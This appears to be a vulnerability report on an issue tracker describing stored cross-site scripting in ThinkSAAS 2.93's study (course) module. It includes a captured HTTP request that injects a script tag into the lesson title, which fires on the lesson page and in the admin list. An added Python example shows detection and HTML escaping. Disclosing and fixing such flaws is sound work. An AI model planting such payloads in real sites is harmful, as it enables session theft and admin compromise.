Stored xss in study
Opened this issue · 0 comments
Eanrach commented
- Environment:
- program version: ThinkSAAS 2.93
- app version: 课程(study) | 1.0
1. Request this url: example.com/index.php?app=study
2. Click '创建课程' (Create Lesson), then you are redirected to example.com/index.php?app=study&ac=create
3. Write the xss payload into '课程标题' (Lesson Title):
```http
POST /index.php?app=study&ac=create&ts=do HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------293582696224464
Content-Length: 668
Origin: http://example.com
Connection: close
Referer: http://example.com/index.php?app=study&ac=create
Cookie: Hm_lvt_1676addd34fc71983d401b8bd972b0c1=1567155131,1567416207; PHPSESSID=5nkq72udqv51008t7f7lsqekau; ts_email=1%401.com; ts_autologin=dgswuiwhehsko8088w40kwow8k0w8oo
Upgrade-Insecure-Requests: 1

-----------------------------293582696224464
Content-Disposition: form-data; name="studyname"

xss<script>alert(1)</script>
-----------------------------293582696224464
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------293582696224464
Content-Disposition: form-data; name="content"

<p>content<br></p>
-----------------------------293582696224464
Content-Disposition: form-data; name="price"

0
-----------------------------293582696224464
Content-Disposition: form-data; name="cateid"

1
-----------------------------293582696224464--
```
4. Then we are redirected to the page we just created, and the alert pops up.
5. The alert also pops up when the admin views the 'Lesson List' ( http://example.com/index.php?app=study&ac=admin&mg=study&ts=list )
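As an added illustration, not part of the report and not ThinkSAAS's own code (which is PHP): a small Python script that parses the multipart body captured above, flags plain-text fields that carry HTML markup, and shows the HTML-escaped form of the title that a template should emit instead of the raw value. The multipart body is a constructed copy of the request in the report; the set of "plain text" fields and the two render helpers are assumptions for the example.

```python
"""Parse the captured multipart/form-data body, flag plain-text fields that
contain markup, and contrast raw vs. HTML-escaped rendering of the title.
Added example; it is not ThinkSAAS code."""
import html
import re

BOUNDARY = "---------------------------293582696224464"

# Constructed copy of the multipart body from the captured request (CRLF endings).
BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="studyname"\r\n'
    "\r\n"
    "xss<script>alert(1)</script>\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="files"; filename=""\r\n'
    "Content-Type: application/octet-stream\r\n"
    "\r\n"
    "\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="content"\r\n'
    "\r\n"
    "<p>content<br></p>\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="price"\r\n'
    "\r\n"
    "0\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="cateid"\r\n'
    "\r\n"
    "1\r\n"
    f"--{BOUNDARY}--\r\n"
)

# Matches ` name="..."` but not `filename="..."` (the preceding char must be ; or space).
NAME_RE = re.compile(r'[;\s]name="([^"]*)"')
# Any HTML start or end tag.
TAG_RE = re.compile(r"</?[A-Za-z][^>]*>")

# Assumption for the example: these fields are plain text, so any markup in
# them is unexpected. "content" comes from a rich-text editor and legitimately
# holds HTML; it needs an allow-list sanitizer, which is out of scope here.
PLAIN_TEXT_FIELDS = {"studyname", "price", "cateid"}


def parse_multipart(body: str, boundary: str) -> dict[str, str]:
    """Return {field name: value} for a multipart/form-data body."""
    delim = "--" + boundary
    fields: dict[str, str] = {}
    for chunk in body.split(delim)[1:]:
        if chunk.startswith("--"):
            break  # closing delimiter "--boundary--"
        chunk = chunk.removeprefix("\r\n")
        head, _, value = chunk.partition("\r\n\r\n")
        match = NAME_RE.search(head)
        if match:
            # The CRLF before the next delimiter belongs to the delimiter, not the value.
            fields[match.group(1)] = value.removesuffix("\r\n")
    return fields


def plain_text_fields_with_markup(fields: dict[str, str],
                                  plain_fields: set[str] = PLAIN_TEXT_FIELDS) -> list[str]:
    """Names of plain-text fields whose submitted value contains HTML tags."""
    return sorted(n for n in plain_fields if n in fields and TAG_RE.search(fields[n]))


def render_title_unsafe(title: str) -> str:
    """What a template effectively does when it interpolates the stored value raw."""
    return f"<h1>{title}</h1>"


def render_title_safe(title: str) -> str:
    """Escape for an HTML text context; the browser then shows the tags as text."""
    return f"<h1>{html.escape(title, quote=True)}</h1>"


if __name__ == "__main__":
    parsed = parse_multipart(BODY, BOUNDARY)
    print("fields:", parsed)
    print("plain-text fields carrying markup:", plain_text_fields_with_markup(parsed))
    print("unsafe:", render_title_unsafe(parsed["studyname"]))
    print("safe:  ", render_title_safe(parsed["studyname"]))
```

Escaping at output time is what stops the stored value from executing on both pages mentioned in the report (the lesson page and the admin lesson list), since both render the same stored title; rejecting tags at submission time is a useful extra signal for logging but is not a substitute for context-aware output encoding.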